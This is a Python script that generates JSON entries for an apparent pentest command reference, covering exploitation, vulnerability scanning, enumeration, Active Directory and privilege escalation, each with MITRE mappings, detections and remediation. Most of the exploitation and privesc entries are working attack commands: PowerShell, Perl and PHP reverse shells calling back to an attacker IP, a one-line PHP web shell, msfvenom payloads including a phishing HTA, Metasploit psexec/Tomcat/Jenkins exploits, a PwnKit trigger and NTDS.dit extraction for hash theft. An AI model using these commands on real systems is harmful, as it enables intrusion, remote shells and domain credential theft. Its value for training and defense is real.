#!/usr/bin/env python3
"""Batch 7 — big push toward 400. Focus: exploitation, vuln assessment, enumeration, AD."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== EXPLOITATION EXPANDED (20) =====================
EX7=[
e("msfconsole-psexec","metasploit","exploitation",5,L,"msfconsole -q -x 'use exploit/windows/smb/psexec; set RHOSTS <target>; set SMBUser admin; set SMBPass pass; exploit'","Metasploit PsExec","Remote code execution via SMB using valid credentials — gets SYSTEM shell.",{"SMBUser":"Username","SMBPass":"Password"},"[+] Meterpreter session opened\nmeterpreter > getuid\nNT AUTHORITY\\SYSTEM","Get SYSTEM shell on Windows with valid admin credentials.",["Admin credentials","SMB port 445 open"],["T1021.002","T1569.002"],"Lateral Movement",["Service creation (Event 7045)","SMB writes to ADMIN$"],["Restrict admin shares","Monitor service creation"],["AV blocks payload"],["impacket-psexec","netexec --exec-method smbexec"],["https://docs.metasploit.com"],["psexec","smb","system","lateral-movement","metasploit"]),
e("msfvenom-php","metasploit","exploitation",5,L,"msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.php","PHP Reverse Shell Payload","Generates PHP reverse shell for upload to web servers.",{"-p php/...":"PHP payload","-f raw":"Raw PHP format"},"Saved as: shell.php","Upload to PHP web servers via file upload vulnerabilities.",["PHP-enabled web server","File upload vulnerability"],["T1505.003"],"Persistence",["New PHP file in web directory","Outbound connection from web process"],["Restrict file uploads","Disable dangerous PHP functions"],["PHP functions disabled (system, exec)"],["pentestmonkey php-reverse-shell","weevely"],["https://docs.metasploit.com"],["php","webshell","upload","payload"]),
e("msfvenom-war","metasploit","exploitation",5,L,"msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f war -o shell.war","WAR File Payload (Tomcat)","Generates WAR file for deployment to Apache Tomcat manager.",{"-f war":"WAR archive format"},"Saved as: shell.war","Deploy to Tomcat via manager interface for code execution.",["Tomcat manager credentials","Manager interface accessible"],["T1190"],"Initial Access",["WAR deployment events","New application in Tomcat"],["Restrict manager access","Strong credentials","IP whitelist"],["Manager not accessible"],["manual JSP shell","cmd.war"],["https://docs.metasploit.com"],["tomcat","war","java","deployment","webshell"]),
e("msfvenom-hta","metasploit","exploitation",5,L,"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f hta-psh -o evil.hta","HTA Payload (Social Engineering)","Generates HTML Application file that executes PowerShell payload when opened.",{"-f hta-psh":"HTA with PowerShell execution"},"Saved as: evil.hta","Deliver via phishing — victim opens HTA, gets shell.",["Target opens HTA file","Outbound connectivity"],["T1218.005"],"Execution",["HTA execution (mshta.exe)","PowerShell spawned from mshta"],["Block HTA execution via GPO","Application whitelisting"],["SmartScreen blocks","AV detects"],["manual HTA with VBScript","macro-enabled documents"],["https://docs.metasploit.com"],["hta","social-engineering","phishing","payload"]),
e("msfconsole-tomcat","metasploit","exploitation",5,L,"msfconsole -q -x 'use exploit/multi/http/tomcat_mgr_upload; set RHOSTS <target>; set HttpUsername admin; set HttpPassword admin; exploit'","Tomcat Manager Upload Exploit","Exploits Tomcat manager with default/weak credentials to deploy malicious WAR.",{"HttpUsername/Password":"Manager credentials"},"[+] Uploading payload...\n[+] Meterpreter session opened","Exploit Tomcat with weak manager credentials — very common finding.",["Tomcat manager accessible","Valid credentials"],["T1190"],"Initial Access",["WAR deployment","New application","Outbound connection from java"],["Change default credentials","Restrict manager to localhost"],["Credentials changed from default"],["manual WAR upload via curl"],["https://docs.metasploit.com"],["tomcat","manager","default-creds","upload"]),
e("msfconsole-jenkins","metasploit","exploitation",5,L,"msfconsole -q -x 'use exploit/multi/http/jenkins_script_console; set RHOSTS <target>; set TARGETURI /; exploit'","Jenkins Script Console RCE","Exploits Jenkins Groovy script console for remote code execution.",{"TARGETURI":"Jenkins base path"},"[+] Executing Groovy script...\n[+] Shell obtained","Exploit unauthenticated or weakly-authenticated Jenkins script console.",["Jenkins accessible","Script console enabled"],["T1190"],"Initial Access",["Groovy script execution","Jenkins audit logs"],["Require authentication","Disable script console","Restrict access"],["Script console disabled","Authentication required"],["manual Groovy reverse shell","jenkins-cli"],["https://docs.metasploit.com"],["jenkins","groovy","rce","ci-cd","devops"]),
e("reverse-shell-powershell","powershell","exploitation",5,W,"powershell -nop -c \"$c=New-Object Net.Sockets.TCPClient('<ip>',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}\"","PowerShell Reverse Shell","One-liner PowerShell reverse shell — works on Windows without additional tools.",{"-nop":"No profile","-c":"Command"},"PS C:\\Users\\victim> whoami","Get reverse shell on Windows using only PowerShell — no binary needed.",["PowerShell available","Outbound TCP allowed"],["T1059.001"],"Execution",["PowerShell network connection","Encoded command execution"],["Constrained Language Mode","Script block logging","AMSI"],["AMSI blocks","Constrained Language Mode"],["Invoke-PowerShellTcp (Nishang)","powercat"],["https://www.revshells.com"],["powershell","reverse-shell","windows","one-liner","fileless"]),
e("reverse-shell-perl","perl","exploitation",5,L,"perl -e 'use Socket;$i=\"<ip>\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'","Perl Reverse Shell","Perl one-liner reverse shell — useful when Python/bash methods fail.",{"use Socket":"Perl socket module","$i/$p":"Attacker IP and port"},"$ whoami\nwww-data","Alternative reverse shell when other languages aren't available.",["Perl installed on target"],["T1059"],"Execution",["Perl spawning network connection"],["Remove unnecessary Perl installations"],["Perl not installed"],["python reverse shell","ruby reverse shell"],["https://www.revshells.com"],["perl","reverse-shell","alternative","one-liner"]),
e("reverse-shell-php","php","exploitation",5,LWM,"php -r '$s=fsockopen(\"<ip>\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'","PHP Reverse Shell (CLI)","PHP command-line reverse shell — useful on web servers with PHP CLI access.",{"fsockopen":"Create TCP connection","exec":"Execute shell"},"$ whoami\nwww-data","Get shell when you have PHP CLI execution (e.g., via command injection).",["PHP CLI available"],["T1059"],"Execution",["PHP process with network connection"],["Disable dangerous PHP functions"],["PHP functions disabled"],["python/perl reverse shell"],["https://www.revshells.com"],["php","reverse-shell","cli","web-server"]),
e("webshell-simple","manual","exploitation",5,LWM,"<?php echo system($_GET['cmd']); ?>","Simple PHP Web Shell","Minimal PHP web shell — one line, execute commands via URL parameter.",{"system()":"Execute OS command","$_GET['cmd']":"Command from URL parameter"},"# Usage: http://target/shell.php?cmd=whoami\nwww-data","Simplest possible web shell — upload via any file upload vulnerability.",["File upload to web-accessible directory","PHP enabled"],["T1505.003"],"Persistence",["New PHP file","system() calls in PHP logs"],["Disable system/exec/passthru","File integrity monitoring"],["PHP functions disabled","File not in web root"],["p0wny-shell (interactive)","weevely (encrypted)"],["https://github.com/flozz/p0wny-shell"],["webshell","php","simple","upload","one-liner"]),
]

# ===================== VULN ASSESSMENT EXPANDED (15) =====================
VA7=[
e("nmap-script-ftp-vuln","nmap","vulnerability_assessment",3,LWM,"nmap --script ftp-vuln* -p 21 <target>","FTP Vulnerability Scripts","Checks for FTP vulnerabilities including backdoors and buffer overflows.",{"--script ftp-vuln*":"All FTP vuln scripts"},"| ftp-vuln-cve2010-4221: VULNERABLE\n|   ProFTPD server buffer overflow","Check FTP servers for known vulnerabilities.",["FTP port 21 open"],["T1190"],"Initial Access",["FTP exploit probes"],["Update FTP software","Use SFTP instead"],["FTP not vulnerable (updated)"],["searchsploit proftpd"],["https://nmap.org/nsedoc/"],["ftp","vulnerability","nse","buffer-overflow"]),
e("nmap-script-ssh-vuln","nmap","vulnerability_assessment",3,LWM,"nmap --script ssh-auth-methods,ssh2-enum-algos -p 22 <target>","SSH Security Audit","Checks SSH authentication methods and algorithms for weak configurations.",{"ssh-auth-methods":"Check auth types","ssh2-enum-algos":"List algorithms"},"| ssh-auth-methods: publickey, password\n| ssh2-enum-algos: diffie-hellman-group1-sha1 (WEAK)","Identify weak SSH configurations — deprecated algorithms, password auth enabled.",["SSH port 22 open"],["T1595"],"Reconnaissance",["SSH probing"],["Disable password auth","Remove weak algorithms","Use Ed25519 keys"],["Not checking for weak key exchange"],["ssh-audit","testssl.sh"],["https://nmap.org/nsedoc/"],["ssh","algorithms","weak","audit","security"]),
e("nmap-script-mysql-vuln","nmap","vulnerability_assessment",3,LWM,"nmap --script mysql-vuln* -p 3306 <target>","MySQL Vulnerability Scripts","Checks MySQL for known vulnerabilities and misconfigurations.",{"--script mysql-vuln*":"All MySQL vuln scripts"},"| mysql-vuln-cve2012-2122: VULNERABLE\n|   Authentication bypass","Check MySQL for known CVEs and auth bypass vulnerabilities.",["MySQL port 3306 open"],["T1190"],"Initial Access",["MySQL exploit probes"],["Update MySQL","Restrict remote access"],["MySQL not vulnerable"],["searchsploit mysql"],["https://nmap.org/nsedoc/"],["mysql","vulnerability","database","nse"]),
e("testssl-heartbleed","testssl","vulnerability_assessment",3,L,"testssl.sh --heartbleed <target>:443","Heartbleed Check","Specifically tests for the Heartbleed vulnerability (CVE-2014-0160).",{"--heartbleed":"Test only Heartbleed"},"Heartbleed (CVE-2014-0160): not vulnerable","Check if SSL/TLS is vulnerable to Heartbleed memory disclosure.",["HTTPS service"],["T1190"],"Initial Access",["Heartbleed probe patterns"],["Update OpenSSL","Revoke and reissue certificates"],["Very rare now (most patched)"],["nmap --script ssl-heartbleed"],["https://testssl.sh"],["heartbleed","ssl","cve","memory-disclosure"]),
e("nmap-script-rdp-vuln","nmap","vulnerability_assessment",3,LWM,"nmap --script rdp-vuln-ms12-020 -p 3389 <target>","RDP Vulnerability Check (BlueKeep)","Checks for critical RDP vulnerabilities including MS12-020 and BlueKeep.",{"--script rdp-vuln-ms12-020":"RDP vulnerability check"},"| rdp-vuln-ms12-020: VULNERABLE\n|   Remote Desktop Protocol DoS/RCE","Check for critical RDP vulnerabilities that allow remote code execution.",["RDP port 3389 open"],["T1210"],"Lateral Movement",["RDP exploit probes"],["Patch RDP vulnerabilities","Enable NLA","Restrict RDP access"],["Already patched"],["metasploit bluekeep scanner"],["https://nmap.org/nsedoc/"],["rdp","bluekeep","vulnerability","critical"]),
e("nmap-script-smb-signing","nmap","vulnerability_assessment",3,LWM,"nmap --script smb2-security-mode -p 445 <target_range>","SMB Signing Check","Checks if SMB signing is required — unsigned SMB enables relay attacks.",{"--script smb2-security-mode":"Check SMB signing"},"| smb2-security-mode:\n|   Message signing enabled but not required","Identify hosts without SMB signing — targets for NTLM relay attacks.",["SMB port 445 open"],["T1557"],"Credential Access",["SMB signing probes"],["Enable and require SMB signing on all hosts"],["Not scanning entire range"],["netexec smb <range> --gen-relay-list"],["https://nmap.org/nsedoc/"],["smb","signing","relay","ntlm","misconfiguration"]),
e("nmap-script-http-shellshock","nmap","vulnerability_assessment",3,LWM,"nmap --script http-shellshock --script-args uri=/cgi-bin/status -p 80 <target>","Shellshock Check","Tests for Shellshock (CVE-2014-6271) in CGI scripts.",{"--script http-shellshock":"Shellshock test","uri=/cgi-bin/status":"CGI script path"},"| http-shellshock: VULNERABLE\n|   CVE-2014-6271","Check CGI scripts for Bash Shellshock vulnerability.",["HTTP with CGI scripts"],["T1190"],"Initial Access",["Shellshock payloads in User-Agent/headers"],["Update Bash","Remove unnecessary CGI scripts"],["No CGI scripts present"],["curl -A '() { :; }; echo vulnerable' http://target/cgi-bin/test"],["https://nmap.org/nsedoc/scripts/http-shellshock.html"],["shellshock","cgi","bash","cve","rce"]),
e("enum-ciphers","nmap","vulnerability_assessment",3,LWM,"nmap --script ssl-enum-ciphers -p 443 <target>","SSL Cipher Enumeration","Lists all supported SSL/TLS ciphers and grades them by strength.",{"--script ssl-enum-ciphers":"Enumerate ciphers"},"| TLSv1.2:\n|   ciphers:\n|     TLS_RSA_WITH_AES_256_CBC_SHA - A\n|     TLS_RSA_WITH_RC4_128_SHA - F (WEAK)","Identify weak ciphers that should be disabled.",["HTTPS service"],["T1595"],"Reconnaissance",["Cipher enumeration probes"],["Disable weak ciphers","Use TLS 1.3 only"],["Not checking all ports with SSL"],["testssl.sh","sslyze"],["https://nmap.org/nsedoc/scripts/ssl-enum-ciphers.html"],["ssl","ciphers","weak","tls","audit"]),
]

# ===================== MORE ENUMERATION (15) =====================
EN7=[
e("nmap-script-vnc","nmap","enumeration",2,LWM,"nmap --script vnc-info,vnc-brute -p 5900 <target>","VNC Enumeration","Checks VNC authentication and attempts brute-force with common passwords.",{"vnc-info":"Get VNC info","vnc-brute":"Brute-force VNC"},"| vnc-info: Protocol version 3.8\n| vnc-brute: password - Valid credentials","Enumerate and brute-force VNC — often has weak or no authentication.",["VNC port 5900 open"],["T1021"],"Lateral Movement",["VNC connection attempts","Brute-force patterns"],["Strong VNC passwords","Restrict VNC access","Use SSH tunneling"],["VNC not running"],["hydra vnc","vncviewer"],["https://nmap.org/nsedoc/"],["vnc","brute-force","remote-desktop","enumeration"]),
e("nmap-script-telnet","nmap","enumeration",2,LWM,"nmap --script telnet-ntlm-info,telnet-encryption -p 23 <target>","Telnet Enumeration","Extracts NTLM info and checks encryption on Telnet services.",{"telnet-ntlm-info":"Get NTLM/domain info","telnet-encryption":"Check encryption"},"| telnet-ntlm-info:\n|   NetBIOS: DC01\n|   Domain: CORP\n|   DNS: dc01.corp.local","Extract domain information from Telnet NTLM authentication.",["Telnet port 23 open"],["T1082"],"Discovery",["Telnet connection attempts"],["Disable Telnet","Use SSH instead"],["Telnet not running (good!)"],["manual telnet connection"],["https://nmap.org/nsedoc/"],["telnet","ntlm","domain","legacy"]),
e("nmap-script-pop3","nmap","enumeration",2,LWM,"nmap --script pop3-capabilities,pop3-ntlm-info -p 110 <target>","POP3 Mail Enumeration","Enumerates POP3 mail server capabilities and NTLM information.",{"pop3-capabilities":"Server capabilities","pop3-ntlm-info":"NTLM/domain info"},"| pop3-capabilities: USER, UIDL, TOP, SASL\n| pop3-ntlm-info: Domain: CORP","Enumerate mail servers for capabilities and domain information.",["POP3 port 110 open"],["T1046"],"Discovery",["POP3 enumeration"],["Restrict POP3 access","Use IMAPS"],["POP3 not running"],["manual telnet to port 110"],["https://nmap.org/nsedoc/"],["pop3","mail","enumeration","ntlm"]),
e("nmap-script-imap","nmap","enumeration",2,LWM,"nmap --script imap-capabilities,imap-ntlm-info -p 143 <target>","IMAP Mail Enumeration","Enumerates IMAP server capabilities and extracts NTLM domain info.",{"imap-capabilities":"Server features","imap-ntlm-info":"Domain info"},"| imap-capabilities: IMAP4rev1, AUTH=PLAIN, IDLE\n| imap-ntlm-info: Domain: CORP","Enumerate IMAP mail servers.",["IMAP port 143 open"],["T1046"],"Discovery",["IMAP enumeration"],["Use IMAPS (993)","Restrict access"],["IMAP not running"],["manual connection"],["https://nmap.org/nsedoc/"],["imap","mail","enumeration"]),
e("nmap-script-mongodb","nmap","enumeration",2,LWM,"nmap --script mongodb-info,mongodb-databases -p 27017 <target>","MongoDB Enumeration","Enumerates MongoDB databases — often unauthenticated.",{"mongodb-info":"Server info","mongodb-databases":"List databases"},"| mongodb-databases:\n|   admin - 64.0KB\n|   users - 128.0KB\n|   production - 512.0KB","Find unauthenticated MongoDB instances and enumerate databases.",["MongoDB port 27017 open"],["T1190"],"Initial Access",["MongoDB connections from unusual IPs"],["Enable authentication","Bind to localhost","Firewall rules"],["Authentication enabled"],["mongosh","mongo CLI"],["https://nmap.org/nsedoc/"],["mongodb","nosql","database","unauthenticated"]),
e("nmap-script-cassandra","nmap","enumeration",2,LWM,"nmap --script cassandra-info -p 9042 <target>","Cassandra Enumeration","Enumerates Apache Cassandra database information.",{"cassandra-info":"Get cluster info"},"| cassandra-info:\n|   Cluster: ProductionCluster\n|   Version: 4.0.1","Discover Cassandra clusters and their configuration.",["Cassandra port 9042 open"],["T1046"],"Discovery",["Cassandra connection attempts"],["Enable authentication","Restrict access"],["Auth required"],["cqlsh"],["https://nmap.org/nsedoc/"],["cassandra","database","cluster","enumeration"]),
e("nmap-script-elasticsearch","nmap","enumeration",2,LWM,"nmap --script http-elasticsearch-info -p 9200 <target>","Elasticsearch Enumeration","Enumerates Elasticsearch cluster — often exposed without authentication.",{"http-elasticsearch-info":"Get cluster info"},"| http-elasticsearch-info:\n|   Cluster: production\n|   Version: 7.17.0\n|   Indices: 45","Find exposed Elasticsearch instances — may contain sensitive indexed data.",["Elasticsearch port 9200 open"],["T1190"],"Initial Access",["Elasticsearch queries from unusual IPs"],["Enable X-Pack security","Restrict access","Authentication"],["Authentication enabled"],["curl http://target:9200/_cat/indices"],["https://nmap.org/nsedoc/"],["elasticsearch","search","database","exposed"]),
e("nmap-script-docker","nmap","enumeration",2,L,"nmap --script docker-version -p 2375,2376 <target>","Docker API Enumeration","Checks for exposed Docker API — unauthenticated access = instant root.",{"docker-version":"Get Docker info","2375/2376":"Docker API ports"},"| docker-version:\n|   Version: 24.0.5\n|   API: 1.43\n|   OS: linux","Find exposed Docker APIs — can create privileged containers for host escape.",["Docker API port open"],["T1610"],"Execution",["Docker API access from external IP"],["Don't expose Docker API","Use TLS authentication","Firewall"],["API not exposed (good!)"],["curl http://target:2375/version","docker -H tcp://target:2375 ps"],["https://nmap.org/nsedoc/"],["docker","api","container","exposed","root"]),
]

# ===================== AD EXTRAS (10) =====================
AD7=[
e("impacket-samrdump","impacket","active_directory",2,L,"impacket-samrdump <domain>/<user>:<pass>@<target>","SAM-R User Dump","Dumps user information via SAM-R protocol — alternative to LDAP enumeration.",{"<domain>/<user>:<pass>@<target>":"Credentials"},"Found user: Administrator (500)\nFound user: Guest (501)\nFound user: svc_sql (1103)","Enumerate domain users via SAM-R when LDAP is restricted.",["Valid credentials","RPC access"],["T1087"],"Discovery",["SAM-R queries"],["Restrict SAM-R access"],["RPC blocked"],["rpcclient","netexec --users"],["https://github.com/fortra/impacket"],["samr","users","enumeration","rpc"]),
e("impacket-reg","impacket","active_directory",6,L,"impacket-reg <domain>/<user>:<pass>@<target> query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","Remote Registry Query","Queries remote Windows registry — find persistence mechanisms and configurations.",{"query":"Query mode","-keyName":"Registry path"},"RunKey1: C:\\Users\\admin\\malware.exe\nRunKey2: C:\\Windows\\System32\\legitimate.exe","Check remote registry for persistence mechanisms, installed software, and configurations.",["Admin credentials","Remote Registry service running"],["T1012"],"Discovery",["Remote registry access events"],["Disable Remote Registry service","Monitor registry access"],["Remote Registry disabled"],["reg query (local)","PowerShell Get-ItemProperty"],["https://github.com/fortra/impacket"],["registry","remote","persistence","enumeration"]),
e("impacket-services","impacket","active_directory",6,L,"impacket-services <domain>/<user>:<pass>@<target> list","Remote Service Enumeration","Lists all Windows services on a remote host — find vulnerable or suspicious services.",{"list":"List all services"},"[*] VulnService - C:\\Program Files\\Vuln\\svc.exe - AUTO_START\n[*] Suspicious - C:\\temp\\backdoor.exe - AUTO_START","Enumerate services for unquoted paths, weak permissions, or suspicious binaries.",["Admin credentials","SMB access"],["T1007"],"Discovery",["Service enumeration via RPC"],["Audit services regularly","Remove unnecessary services"],["Not checking service binary permissions"],["sc query (local)","netexec --services"],["https://github.com/fortra/impacket"],["services","enumeration","remote","windows"]),
e("impacket-atexec","impacket","active_directory",6,L,"impacket-atexec <domain>/<user>:<pass>@<target> 'whoami'","AT Exec (Task Scheduler)","Executes commands via Windows Task Scheduler — another lateral movement method.",{"'whoami'":"Command to execute"},"[*] Creating task...\n[*] Running task...\nnt authority\\system","Execute commands via scheduled tasks — different artifact than PsExec/WMI.",["Admin credentials","Task Scheduler accessible"],["T1053.005"],"Execution",["Scheduled task creation (Event 4698)","Task execution events"],["Monitor task creation","Restrict remote task scheduling"],["Task Scheduler service disabled"],["impacket-wmiexec","impacket-psexec"],["https://github.com/fortra/impacket"],["task-scheduler","execution","lateral-movement","at"]),
e("powerview-acl","powerview","active_directory",6,W,"Import-Module .\\PowerView.ps1; Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'helpdesk'}","PowerView ACL Enumeration","Finds interesting ACL permissions for a specific group — GenericAll, WriteDACL, etc.",{"Find-InterestingDomainAcl":"Find exploitable ACLs","-ResolveGUIDs":"Show readable names"},"ObjectDN: CN=Domain Admins\nActiveDirectoryRights: GenericAll\nIdentityReference: CORP\\helpdesk","Find ACL-based attack paths — permissions that allow privilege escalation without exploits.",["PowerShell access","PowerView loaded"],["T1069"],"Discovery",["PowerShell script execution","LDAP ACL queries"],["Audit ACLs","Remove unnecessary permissions"],["AMSI blocks PowerView"],["bloodhound (visual)","aclpwn"],["https://github.com/PowerShellMafia/PowerSploit"],["acl","permissions","powerview","attack-path"]),
]

# ===================== PRIVESC EXTRAS (10) =====================
PE7=[
e("linux-sudo-cve","manual","privilege_escalation",6,L,"sudo -V && sudoedit -s '\\' $(python3 -c 'print(\"A\"*1000)')","Sudo CVE-2021-3156 (Baron Samedit)","Exploits heap overflow in sudo for instant root — affects sudo < 1.9.5p2.",{"sudo -V":"Check version","sudoedit -s":"Trigger vulnerability"},"# If vulnerable:\n# Segmentation fault (exploitable)\n# Use exploit: https://github.com/blasty/CVE-2021-3156","Instant root on unpatched systems — one of the most impactful Linux privesc CVEs.",["sudo < 1.9.5p2"],["T1068"],"Privilege Escalation",["Unusual sudoedit crashes","Exploit binary execution"],["Update sudo immediately"],["sudo already patched"],["linpeas (checks version)","linux-exploit-suggester"],["https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit"],["sudo","cve","heap-overflow","instant-root"]),
e("linux-polkit-cve","manual","privilege_escalation",6,L,"# CVE-2021-4034 (PwnKit):\npython3 -c 'import os;os.execvp(\"pkexec\",[\"\"]);'","PwnKit (CVE-2021-4034)","Exploits pkexec SUID binary for instant root — affects almost all Linux distros.",{"pkexec":"Polkit's pkexec binary (SUID)"},"# whoami\nroot","Instant root on nearly all unpatched Linux systems — trivial to exploit.",["pkexec installed with SUID (default)","Unpatched polkit"],["T1068"],"Privilege Escalation",["pkexec execution with unusual arguments"],["Patch polkit","Remove SUID from pkexec"],["Already patched"],["metasploit exploit/linux/local/cve_2021_4034_pwnkit"],["https://github.com/berdav/CVE-2021-4034"],["pwnkit","polkit","pkexec","cve","instant-root"]),
e("linux-dirty-pipe","manual","privilege_escalation",6,L,"# CVE-2022-0847 (Dirty Pipe):\n./exploit /etc/passwd 1 '${openssl_hash}'","Dirty Pipe (CVE-2022-0847)","Overwrites read-only files via pipe buffer manipulation — kernel 5.8 to 5.16.11.",{"exploit":"Compiled exploit binary","/etc/passwd":"Target file"},"# Overwrites /etc/passwd with new root entry\n# su hacker → root","Overwrite any file regardless of permissions — modify /etc/passwd for root.",["Kernel 5.8 - 5.16.11","Compiled exploit"],["T1068"],"Privilege Escalation",["File modification without write permission","Kernel exploit indicators"],["Update kernel","Monitor file integrity"],["Kernel not in vulnerable range"],["linpeas","linux-exploit-suggester"],["https://dirtypipe.cm4all.com"],["dirty-pipe","kernel","file-overwrite","cve"]),
e("windows-sebackup","manual","privilege_escalation",6,W,"# With SeBackupPrivilege:\nrobocopy /B C:\\Windows\\NTDS . ntds.dit\nreg save HKLM\\SYSTEM system.bak","SeBackupPrivilege Abuse","Abuses SeBackupPrivilege to copy NTDS.dit and SYSTEM hive for offline hash extraction.",{"/B":"Backup mode (bypasses ACLs)","reg save":"Save registry hive"},"# Then on attacker:\nimpacket-secretsdump -ntds ntds.dit -system system.bak LOCAL","Extract all domain hashes by abusing backup privileges to copy protected files.",["SeBackupPrivilege assigned"],["T1003.003"],"Credential Access",["Backup of NTDS.dit","Registry hive export"],["Restrict SeBackupPrivilege","Monitor NTDS.dit access"],["Privilege not assigned"],["diskshadow + robocopy","wbadmin"],["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation"],["sebackup","ntds","privilege","domain-hashes"]),
e("windows-seimpersonate-godpotato","godpotato","privilege_escalation",6,W,"GodPotato.exe -cmd 'cmd /c whoami'","GodPotato (Latest Potato)","Latest potato exploit — works on Windows 10/11/Server 2022 with SeImpersonatePrivilege.",{"-cmd":"Command to run as SYSTEM"},"[+] Exploit successful!\nnt authority\\system","Most reliable modern potato exploit — works where JuicyPotato and PrintSpoofer fail.",["SeImpersonatePrivilege"],["T1134"],"Privilege Escalation",["COM object manipulation","Token impersonation"],["Remove SeImpersonatePrivilege"],["Privilege not available"],["PrintSpoofer","SweetPotato","JuicyPotato"],["https://github.com/BeichenDream/GodPotato"],["godpotato","seimpersonate","system","latest","potato"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 7...")
    save("bulk7_exploit.json",EX7)
    save("bulk7_vuln.json",VA7)
    save("bulk7_enum.json",EN7)
    save("bulk7_ad.json",AD7)
    save("bulk7_privesc.json",PE7)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
